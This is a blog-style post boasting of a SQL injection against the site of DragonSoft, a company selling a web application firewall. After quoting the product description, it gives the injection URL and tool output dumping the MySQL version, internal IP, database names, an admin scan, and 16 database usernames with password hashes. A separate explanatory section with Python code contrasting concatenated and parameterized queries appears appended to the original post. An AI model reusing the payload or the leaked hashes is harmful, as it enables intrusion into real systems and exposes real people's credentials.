Lol, a funny site that offers its clients protection from attacks like SQL injection, XSS, BoF, etc.
But really, why not secure its own site? :( Ohh noo
And a nice logo.
So DragonSoft says:
http://www.dragonsoft.com/product/01.php
What is DragonWAF?
DragonWAF is a host-based web application firewall using filtration algorithms; it aims to filter and prevent malicious coding attacks and defacements targeting personal, SMB and corporate web sites hosted on Microsoft IIS Web Servers. The attack patterns and sources are recorded regardless of the encryption status of the attacking word strings; DragonWAF records by date, incoming IP address and attack type. The data are transformed into graphical reports which allow web masters to take easy control of security management on their IIS Web Servers.
Best Web Server Protection Solution for SMB
DragonWAF proactively filters all known and unknown vulnerability attacks and protects web server security. DragonSoft offers the best reasonably priced package to SMB websites against malicious attacks and web defacements.
- Website malicious attack & injection filtration
- Customizable Remote Warning Page
- SQL Injection Prevention
- Buffer Overflow Protection
- OWASP/PCI-DSS 6.6 compliant
- Shellcode Exploits Prevention
- HTTP Allowed Methods Prevention
- Encoding Attack Prevention
- Directory Traversal Prevention
- Keyword Strings Filtration
- Cross Site Scripting, (XSS) Attack Prevention
- AJAX Attack Prevention
- X Path Attack Prevention
- XML Attack Prevention
- Allow Directory Prevention
- Support SSL websites
------------------------ But not really.
Let me tell you something :)
Biggies fail.
[+] URL: http://www.dragonsoft.com/events/list.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,5,6
[+] 22:45:00
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Gathering MySQL Server Configuration...
Database: dragonsoft
User: www@192.168.0.201
Version: 5.1.47-log
[+] Do we have Access to MySQL Database: YES <-- w00t w00t
[+] Dumping MySQL user info. host:user:password
[+] Number of users in the mysql.user table: 16
[0] localhost:root:*2253B4B9A751792D40AEC921E5DF5748B140FFC4
[1] test.dragonsoft:root:*2253B4B9A751792D40AEC921E5DF5748B140FFC4
[2] 127.0.0.1:root:*2253B4B9A751792D40AEC921E5DF5748B140FFC4
[3] 192.168.0.%:www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD
[4] localhost:webprot:*ECA459A855FC3E72F690A6595BA4DA5E472D760E
[5] localhost:www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD
[6] localhost:dcalendar:*090F8762C8C0778DFDBB200DD8748F979D812C18
[7] 192.168.0.%:kay:*B0AC41A8F1A5FB7AC4A313B1A4A65F3038A343C5
[8] 192.168.0.%:george:*6B05113CA60CA58DD62D7ED34941F68C6968B108
[9] 192.168.0.%:linus:*F1854B79E7636559FC27CB27AEFAF100B556DCBD
[10] 192.168.0.%:webprot:*ECA459A855FC3E72F690A6595BA4DA5E472D760E
[11] 192.168.0.%:root:*2253B4B9A751792D40AEC921E5DF5748B140FFC4
[12] 192.168.0.%:repl:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD
[13] 192.168.0.%:walter:*BDF7F6F2BF488168D5B4C2C87DB50FF1863B1E4D
[14] localhost:tony:*47318AF21EAB59984F5D7599F76191B6F4C32B7E
[15] 192.168.0.%:tony:*C617F3F58E152DBD282903477F1B5CAA255F0C10
[+] Showing all databases current user has access too!
[+] Number of Databases: 13
[1] A-VAC
[2] calendar
[3] dragonsoft
[4] ds
[5] dsdz
[6] mysql
[7] order
[8] phpwind
[9] smb_reg
[10] test
[11] waf
[12] wp_reg
[13] wp_reg_old
[-] [22:45:30]
[-] Total URL Requests: 20
[-] Done
Scanning for any admin folder or file, but nothing:
[ + ] URL : http://www.dragonsoft.com/
[ + ] Date: Sat May 28 22:56:31 2011
[ + ] Scanning. . . . .
http://www.dragonsoft.com/file --------> ( 403 Forbidden ) -- ( 403 Forbidden )
http://www.dragonsoft.com/include --------> ( 403 Forbidden ) -- ( 403 Forbidden )
http://www.dragonsoft.com/js --------> ( 403 Forbidden ) -- ( 403 Forbidden )
http://www.dragonsoft.com/css --------> ( 403 Forbidden ) -- ( 403 Forbidden )
http://www.dragonsoft.com/doc --------> ( 403 Forbidden ) -- ( 403 Forbidden )
http://www.dragonsoft.com/config.php --------> ( 200 OK ) -- ( )
[ + ] Done ! - End Scanning !
*-----------------------------------------------------------------------------*
How is this possible? All MySQL users dumped, and an easy SQL injection not protected by any fucking WAF ..
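The injection above works for one reason only: the `id` parameter of `list.php` is pasted into the SQL text, so `5 AND 1=2 UNION SELECT 1,2,3,4,5,6` becomes part of the query and the six injected columns come back in the page. A filtering WAF sitting in front of that is a signature check, not a fix. The added example below is not DragonSoft's code or the page's own; it uses Python with sqlite3 standing in for PHP/MySQL, a constructed `events` table, and hypothetical function names. It shows the vulnerable concatenation beside the hardened version (integer validation plus a bound parameter), and a request-log check that flags the page's payload as a detection signal rather than a substitute for the fix.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed sample schema standing in for an events table; not DragonSoft's schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE events (id INTEGER, title TEXT, body TEXT, dt TEXT, place TEXT, link TEXT)"
    )
    conn.execute(
        "INSERT INTO events VALUES (5, 'Launch', 'Product launch', '2011-05-28', 'Taipei', '/events/5')"
    )
    conn.commit()
    return conn


# Vulnerable pattern (hypothetical reconstruction): the raw request parameter is
# concatenated into the SQL string, so the attacker controls the WHERE clause.
def list_events_vulnerable(conn, raw_id):
    sql = "SELECT id, title, body, dt, place, link FROM events WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


# Hardened version: the id must parse as an integer and is passed as a bound
# parameter, so the database never sees attacker-supplied SQL text.
def list_events_safe(conn, raw_id):
    try:
        event_id = int(raw_id)
    except (TypeError, ValueError):
        return None  # reject before any query runs; this is the request to log
    return conn.execute(
        "SELECT id, title, body, dt, place, link FROM events WHERE id=?",
        (event_id,),
    ).fetchall()


# Detection signal for a request log or WAF rule: decode the query string the way
# the server would and look for a UNION ... SELECT pair. Signature checks like this
# are worth having for alerting, but they do not make the concatenation above safe.
UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)


def looks_like_sqli(query_string):
    decoded = unquote_plus(query_string)
    return UNION_SELECT.search(decoded) is not None


# The page's payload, with the '+' encoding decoded to spaces.
PAYLOAD = "5 AND 1=2 UNION SELECT 1,2,3,4,5,6"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", list_events_vulnerable(db, PAYLOAD))  # injected row comes back
    print("safe:", list_events_safe(db, PAYLOAD))              # None, request rejected
    print("safe, legit id:", list_events_safe(db, "5"))
    print("flagged:", looks_like_sqli("id=5+AND+1=2+UNION+SELECT+1,2,3,4,5,6"))
```

The first query returns the injected tuple `(1, 2, 3, 4, 5, 6)` because `1=2` empties the real result set and the `UNION` appends the attacker's columns; the bound-parameter version never reaches the database with that input. The integer check is the part that matters for an `id` parameter: it fails closed on anything that is not a number, independent of what any front-end filter recognises.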